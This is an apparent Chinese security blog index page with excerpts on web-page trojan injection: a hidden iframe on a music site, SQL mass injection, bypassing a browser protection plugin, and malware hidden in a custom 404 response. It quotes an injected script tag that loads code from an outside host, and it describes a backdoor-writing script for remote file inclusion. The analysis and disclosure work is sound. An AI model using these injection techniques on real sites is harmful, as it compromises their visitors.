鬼仔's Blog

作者： yimike
来源： 剑盟

近来有朋友反映酷狗音乐首页挂马，而且奇怪的是只有第一次访问该页时杀软会提示挂马；之后除非换IP，否则无论怎么刷新杀软都不会提示网页挂马。于是循着这个线索，打开了酷狗音乐首页(h**p://www.kugou.com/home)，最终找到了极其隐蔽的挂马。

详细过程如下：

1.h**p://www.kugou.com/home该页面代码看似正常，但是有个看起来比较正常但是却比较隐蔽的iframe,代码如下：

<IFRAME marginWidth=0 marginHeight=0 src="cairing.htm" frameBorder=0 width=230 scrolling=no height=327></IFRAME>

这里的cairing.htm指向的是h**p://www.kugou.com/home/cairing.htm
阅读全文 »

作者：茄子宝

以前说过的趋势挂马事件，MS这个挂马方法已经流行了很久，从去年就大规模开始了，在网上可以搜到很多痕迹。

SQL语句如下：

用游标遍历所有表里如下数据类型的字段，然后UPDATE挂马。（全部是允许写入字符的字段）

阅读全文 »

鬼仔注：前几天学校有点事，最近几天又忙着blog转换数据，再加上有点别的事，所以更新没跟上，刚才把这几天积攒的东西都发了。 :) 畅游巡警是大成天下这几天刚发布的新产品。这篇日志的前半部分是54nop的，后半部分是吴鲁加的，嘿嘿，综合了下。

--------------54nop--------------

畅游巡警介绍:
http://www.cnbeta.com/articles/54118.htm

绕过demo avi: (vmware录的,用klite codec pack播放)
http://bootshell.googlepages.com/SecPlugin_Bypass.rar
http://rapidshare.de/files/39213725/secplugin_bypass.rar.html

--------------吴鲁加--------------

畅游巡警发布测试版的第二天，在 54nop 的 Blog 的上看一篇《绕过畅游巡警的网页木马防护》，反而是有几分高兴，高兴的是：

阅读全文 »

来源：六翼刺猬的某某刺猬窝

http://www.688ip.com/dae5g45

今天在卡饭看到的被说是挂马的东西，想要获取源码但返回了404；

细心一看，的确被挂马了，从服务器那里返回的404信息里面包含了挂马代码：

<script src="http://ad.shitip.com/file/da.js"></script>

貌似最近第三次看到了；

P.S. 某服务器返回的404信息是可以自定义的，如Google的那些：http://www.google.com/2.htm

细想一下，这样是一个不错的挂马选择：

先把挂马代码插入到要返回的404信息里面；

然后才在正常的页面里面写入<iframe>框架或者<script>脚本，src指向本地域名的一个无效URL；
阅读全文 »

来源：红狼
作者：f3v3r

批量写入档案脚本...
可以拿来挂马
也能拿来当RFI的后门注入
code都写明的，有需要的请自己看
后门写在$inj里面，要做base64 encode的Polymorphic
不希望这个东西被搞破坏的人拿去玩
懂原理的就自个儿收下吧

阅读全文 »

鬼仔注：上次发过 大家来投稿啦~~~ 之后，只接到几篇的投稿，不过有的是发过的，有的觉得不适合在这里发，所以一直没发，今天发的这篇是第一个。而且 sujean（cnqing@gmail.com） 告知我原来发过的一篇文章 如何杜绝iframe挂马 原作者应该是灵儿，所以我也将原来发过的那篇修改了下，加上了原作者。

感谢 sujean（cnqing@gmail.com） 的投递。

本文原创：linr@cncert.net 请转载时保留版权信息
阅读全文 »